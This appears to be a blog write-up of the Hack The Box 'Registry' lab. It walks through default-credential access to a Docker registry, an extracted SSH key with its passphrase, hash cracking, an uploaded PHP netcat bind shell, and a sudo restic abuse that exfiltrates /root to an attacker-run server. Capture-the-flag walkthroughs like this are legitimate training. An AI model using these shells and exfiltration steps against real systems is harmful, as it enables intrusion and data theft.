HTB: Registry

Details

This machine is Registry from Hack The Box

Recon

Started with a service discovery scan

root@kali:~# nmap -sV -p- -T4 10.10.10.159
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 21:13 GMT
Nmap scan report for 10.10.10.159
Host is up (0.021s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     nginx 1.14.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.33 seconds

User

Simple to start with then, first port 80 http://10.10.10.159/

Screenshot 1

Then 443 https://10.10.10.159/

Screenshot 2

The cert was issued to docker.registry.htb

Screenshot 3

So I added the following to my hosts file

docker.registry.htb
registry.htb 

Then tried https://registry.htb/

Screenshot 4

But https://docker.registry.htb/ gave a blank page, now I did some googling and docker registry has a /v2 endpoint, so I tried https://docker.registry.htb/v2/, which asked for auth. I tried

admin : admin

Which loaded, so I tried https://docker.registry.htb/v2/_catalog

Screenshot 5

I gravved the manifest data view-source:https://docker.registry.htb/v2/bolt-image/manifests/latest and using the following template URL I downloaded all the files

https://docker.registry.htb/v2/bolt-image/blobs/<HASHES>

As they are all gunzips, I unziped them which left me with

root@kali:~# file ./*
./backups:                                                                 directory
./sha256_02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c: POSIX tar archive
./sha256_2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791: POSIX tar archive
./sha256_302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b: POSIX tar archive
./sha256_3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee: POSIX tar archive
./sha256_8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797: POSIX tar archive
./sha256_a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4: data
./sha256_c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7: POSIX tar archive
./sha256_d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a: POSIX tar archive
./sha256_f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff: POSIX tar archive
./sha256_f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0: POSIX tar archive

I then extracted these tar files, and checked the root directory, which had a .ssh directory, inside were id_rsa and id_rsa.pub

root@kali:/tmp/root/.ssh# cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDQ0QB2PXyb2AUShspjygtkqjzXFuX0dbayPI/irOEYCAOtgQs+nb9Ij3vZZX+LMPpNtWJaGF+ti/5gTjnhfjyNji7L/3Se6aIJAqMlFqkf+E5xKntRlM9dpqMMNRLgAYAKW5lj5OciQ7ZaXx7btoYLiQHlxXbj8RwEirWuFqwbi2lznckAU9Ua1DSu6yKdqIIpkB2FvJVFakTS32FagJ+rGm9TIWeiOPaQvKhyXQ0jeBL4Sdi5PmhLtkdOEWVgYVSoWaOythA3J2c1UAhfl5dLGS0FuD4Dv46xyrI8H7gpAexa1yF3Kei4PTHBEIQxscejsfCEOVZwe4sngYKrU7o6sf0rWpOf7jHuEUMCZVQgQ55fvv10P6CA2qhPQ/bpKzp2pGXRb1Xdr6v+ObgQ4knkK1GKqOegOane0wyhD5RFQF/NeYBqt1UIM2KigDv9foENc7p9HhHGFoWJEzyOeWCm4QcSg9H2ZgfZRAhCoiEijHh19SdNh9wanydkaj9H7iTsvNDi8ON4sLRGjVBsfPLl+UjIIsHU+bG+pxHUzb65yHJ8iFX+DndJncdbQs6X9Ckii58ElBmkSUDSZpFsOV81vVk6qdGm+EBcpVO09YsC03nUj1VEHtQG8hOG/tJqesB50I5Gbi7+V2qZit3ZZOvkhVF5l2N0U9asjSpIT5Bmow== bolt@registry.htb

root@kali:/tmp/root/.ssh# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1C98FA248505F287CCC597A59CF83AB9

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
Bdtfi9goJBFb6P7yHapZ13W30b96ZQG4Gdf4ZeV6MPMizcTbiggZRBokZLCBMb5H
pgkPgTrGJlbm+sLu/kt4jgex3T/NWwXHVrny5kIuTbbv1fXfyfkPqU66eysstO2s
OxciNk4W41o9YqHHYM9D/uL6xMqO3K/LTYUI+LcCK13pkjP7/zH+bqiClfNt0D2B
Xg6OWYK7E/DTqX+7zqNQp726sDAYKqQNpwgHldyDhOG3i8o66mLj3xODHQzBvwKR
bJ7jrLPW+AmQwo/V8ElNFPyP6oZBEdoNVn/plMDAi0ZzBHJc7hJ0JuHnMggWFXBM
PjxG/w4c8XV/Y2WavafEjT7hHuviSo6phoED5Zb3Iu+BU+qoEaNM/LntDwBXNEVu
Z0pIXd5Q2EloUZDXoeyMCqO/NkcIFkx+//BDddVTFmfw21v2Y8fZ2rivF/8CeXXZ
ot6kFb4G6gcxGpqSZKY7IHSp49I4kFsC7+tx7LU5/wqC9vZfuds/TM7Z+uECPOYI
f41H5YN+V14S5rU97re2w49vrBxM67K+x930niGVHnqk7t/T1jcErROrhMeT6go9
RLI9xScv6aJan6xHS+nWgxpPA7YNo2rknk/ZeUnWXSTLYyrC43dyPS4FvG8N0H1V
94Vcvj5Kmzv0FxwVu4epWNkLTZCJPBszTKiaEWWS+OLDh7lrcmm+GP54MsLBWVpr
-----END RSA PRIVATE KEY-----

Looked like the key for the server, I tried to crack it but had no luck so carried on digging. Inside the .bash_history file were various references to /etc/profile.d so I tool a look inside that directory, and found an interesting file

root@kali:/tmp/etc/prfoile.d# cat 01-ssh.sh 
#!/usr/bin/expect -f
#eval `ssh-agent -s`
spawn ssh-add /root/.ssh/id_rsa
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\n";
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
interact

So the passphrase for the ssh key is

GkOcz221Ftb3ugog

I tried it against ssh

root@kali:/tmp/root/.ssh# ssh bolt@registry.htb -i ./id_rsa 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Sat Feb 22 22:27:53 UTC 2020

  System load:  0.91              Users logged in:                0
  Usage of /:   6.8% of 61.80GB   IP address for eth0:            10.10.10.159
  Memory usage: 31%               IP address for br-1bad9bd75d17: 172.18.0.1
  Swap usage:   0%                IP address for docker0:         172.17.0.1
  Processes:    154
Last login: Mon Oct 21 10:31:48 2019 from 10.10.14.2
bolt@bolt:~$

So I grabbed the user flag

bolt@bolt:~$ ls -la
total 28
drwx------ 6 bolt bolt 4096 Oct 21 08:59 .
drwxr-xr-x 3 root root 4096 Oct  8 21:00 ..
lrwxrwxrwx 1 bolt bolt    9 May 26  2019 .bash_history -> /dev/null
drwx------ 3 bolt bolt 4096 Sep 27 09:17 .cache
drwx------ 3 bolt bolt 4096 Sep 26 23:35 .gnupg
drwxrwxr-x 3 bolt bolt 4096 Sep 27 09:17 .local
drwx------ 2 bolt bolt 4096 Oct 17 09:54 .ssh
-r-------- 1 bolt bolt   33 Sep 26 21:09 user.txt

bolt@bolt:~$ cat user.txt 
[REDACTED]

User 2

There is a file called backup.php on the webserver

bolt@bolt:/var/www/html$ ls -la
total 28
drwxrwxr-x  4 www-data www-data 4096 Oct 21 08:41 .
drwxr-xr-x  4 root     root     4096 May 26  2019 ..
-rw-r--r--  1 root     root       85 May 25  2019 backup.php
-rw-------  1 git      www-data    0 Oct  8 21:54 .bash_history
drwxrwxr-x 11 www-data www-data 4096 Oct 21 08:27 bolt
-rwxrwxr-x  1 www-data www-data  612 May  6  2019 index.html
-rw-r--r--  1 root     root      612 Oct 21 08:41 index.nginx-debian.html
drwxr-xr-x  2 root     root     4096 Sep 26 21:13 install

bolt@bolt:/var/www/html$ cat backup.php 
<?php shell_exec("sudo restic backup -r rest:http://backup.registry.htb/bolt bolt");

I added the new subdomain to my hosts file and checked it out at http://backup.registry.htb/bolt/

Screenshot 6

I found the db

bolt@bolt:/var/www/html/bolt/app/database$ ls -la
total 300
drwxrwxr-x 2 www-data www-data   4096 Oct 21 09:09 .
drwxrwxr-x 9 www-data www-data   4096 Oct 21 10:04 ..
-rw-r--r-- 1 www-data www-data 294912 Feb 22 22:47 bolt.db
-rw-rw-r-- 1 www-data www-data    170 Oct  8 21:16 .gitignore

I extracted the file to see if I could pull admin creds out of it

root@kali:~# scp -i ./id_rsa bolt@registry.htb:/var/www/html/bolt/app/database/bolt.db ./bolt.db
root@kali:~# sqlite3 
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite>

sqlite> .open /tmp/bolt.db

sqlite> select * from bolt_users;
1|admin|$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK|bolt@registry.htb|2019-10-17 14:34:52|10.10.14.2|Admin|["files://shell.php"]|1||||0||["root","everyone"]

I took the hash and threw john at it

root@kali:~# john bolthash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
strawberry       (?)
1g 0:00:00:01 DONE (2020-02-22 23:04) 0.8064g/s 304.8p/s 304.8c/s 304.8C/s strawberry..metallica
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So the creds for bolt are

admin : strawberry

Login at http://backup.registry.htb/bolt/bolt/login

Screenshot 7

Login as admin

Screenshot 8

There is a file upload option on http://backup.registry.htb/bolt/bolt/files

Screenshot 9

I tried to upload a php shell

Screenshot 10

Digging around led to http://backup.registry.htb/bolt/bolt/file/edit/config/config.yml

Screenshot 11

Now it says that adding php won't work, but I tried it anyway, and...

Screenshot 12

Now it didn't seem to connect back with any reverse shells, or with nc, so I tried nc.traditional and a bind shell

root@kali:~# echo '<?php system ( "nc.traditional -nlvp 4444 -e /bin/bash" ) ?>' > bind.php

Which I then uploaded and connected to

root@kali:~# nc 10.10.10.159 4444  

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)  

python -c "import pty;pty.spawn('/bin/bash')"
www-data@bolt:~/html/bolt/files$ 

See if I can priv esc from here

www-data@bolt:~/html/bolt/files$ sudo -l
Matching Defaults entries for www-data on bolt:
    env_reset, exempt_group=sudo, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bolt:
    (root) NOPASSWD: /usr/bin/restic backup -r rest*

So I did a lot of reading over at https://restic.readthedocs.io/en/stable/, and eventually I had an exploit chain in mind, the idea was simple. I would attempt to backup their /root directory, to a backup server I control, then restore it locally where I can read it

root@kali:~# apt install restic
root@kali:~# estic init --repo /tmp/restic
enter password for new repository: 
enter password again: 
created restic repository 71c782ef94 at /tmp/restic

Please note that knowledge of your password is required to access
the repository. Losing your password means that your data is
irrecoverably lost.

I used the password "password", next I needed to forward out some ports as I can't callback nicely

root@kali:~# ssh -i ./id_rsa -R 8000:127.0.0.1:8000 bolt@10.10.10.159

And then setup the rest server

root@kali:~# wget https://github.com/restic/rest-server/releases/download/v0.9.7/rest-server-0.9.7-linux-amd64.gz

root@kali:~# gunzip -d rest-server-0.9.7-linux-amd64.gz

root@kali:~# chmod +x ./rest-server-0.9.7-linux-amd64

root@kali:~# ./rest-server-0.9.7-linux-amd64 
rest-server 0.9.7 compiled with go1.10 on linux/amd64
Data directory: /tmp/restic
Authentication disabled
Private repositories disabled
Starting server on :8000

Then I need to give my backup access to the password

www-data@bolt:/tmp$ echo 'password' > ./password

And trigger the backup

www-data@bolt:/tmp$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8000 --password-file password /root

Then I locally restore the backup to read the files

root@kali:~# restic -r /tmp/restic restore latest --target /tmp/restored

Inside if the flag, but also an ssh key, it's more satisfying to get a shell so

root@kali:~# ssh root@registry.htb -i ./id_rsa 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Sat Feb 22 23:57:24 UTC 2020

  System load:  0.0               Users logged in:                1
  Usage of /:   7.2% of 61.80GB   IP address for eth0:            10.10.10.159
  Memory usage: 28%               IP address for br-1bad9bd75d17: 172.18.0.1
  Swap usage:   0%                IP address for docker0:         172.17.0.1
  Processes:    165
Last login: Mon Oct 21 09:53:48 2019
root@bolt:~#

root@bolt:~# ls -la
total 76
drwx------  7 root root  4096 Oct 21 10:37 .
drwxr-xr-x 23 root root  4096 Oct 21 08:42 ..
lrwxrwxrwx  1 root root     9 May 28  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root  3106 Sep 26 23:37 .bashrc
drwx------  2 root root  4096 Sep 26 23:39 .cache
drwxr-xr-x  3 root root  4096 Sep 27 09:17 .config
-rw-r--r--  1 root root 20999 Oct 21 10:04 config.yml
-rw-r--r--  1 root root   118 Oct 21 10:37 cron.sh
drwx------  3 root root  4096 Sep 26 23:39 .gnupg
drwxr-xr-x  3 root root  4096 Oct  8 20:57 .local
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-r--------  1 root root    33 Sep 26 21:07 root.txt
-rw-r--r--  1 root root    66 Oct 21 10:00 .selected_editor
drwxr-xr-x  2 root root  4096 Oct 17 09:58 .ssh
-rw-r--r--  1 root root   215 Oct 21 08:59 .wget-hsts

root@bolt:~# cat root.txt 
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *